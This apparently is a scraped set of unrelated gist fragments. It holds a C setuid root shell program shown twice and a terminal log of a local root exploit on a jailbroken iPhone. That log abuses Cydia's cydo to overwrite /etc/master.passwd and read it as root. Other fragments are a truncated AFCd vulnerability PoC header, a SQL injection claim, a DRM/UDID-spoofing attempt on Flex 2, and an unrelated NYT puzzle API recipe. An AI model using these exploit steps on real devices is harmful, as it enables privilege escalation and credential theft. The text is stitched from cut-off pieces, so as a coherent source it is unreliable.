Generic shell dropper:
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv, char **envp) {
setuid(0);
execl("/bin/sh", "/bin/sh", 0);
return 0;
}
1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json | |
2. Extract results.mini_puzzle.[*].puzzle_id | |
3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json | |
4. Parse the data. |
Generic shell dropper:
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv, char **envp) {
setuid(0);
execl("/bin/sh", "/bin/sh", 0);
return 0;
}
Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd | |
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log | |
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh" | |
thou shalt not pass | |
Hakans-iPhone:/var/tmp mobile$ su cydo | |
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd | |
## | |
# User Database | |
# | |
# This file is the authoritative user database. |
#! /usr/bin/env python | |
""" | |
PoC of AFCd Vulnerability After Pangu Jailbreak | |
Copyright (C) 2014 PythEch | |
This program is free software: you can redistribute it and/or modify | |
it under the terms of the GNU General Public License as published by | |
the Free Software Foundation, either version 3 of the License, or | |
(at your option) any later version. |
This gist includes multiple SQL injection vulnerabilities I found by accident in a bus while travelling. These vulnerabilities are easy to find and easy to exploit, and critical.
I already have Flex legacy paid but, can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot, downloaded the beta from getdelta.co
For fun, I tried to figure out whether spoofing UDID is possible by patching Flex 2 itself. I already knew you have put so much work into DRM. I'm still unsuccessful at this.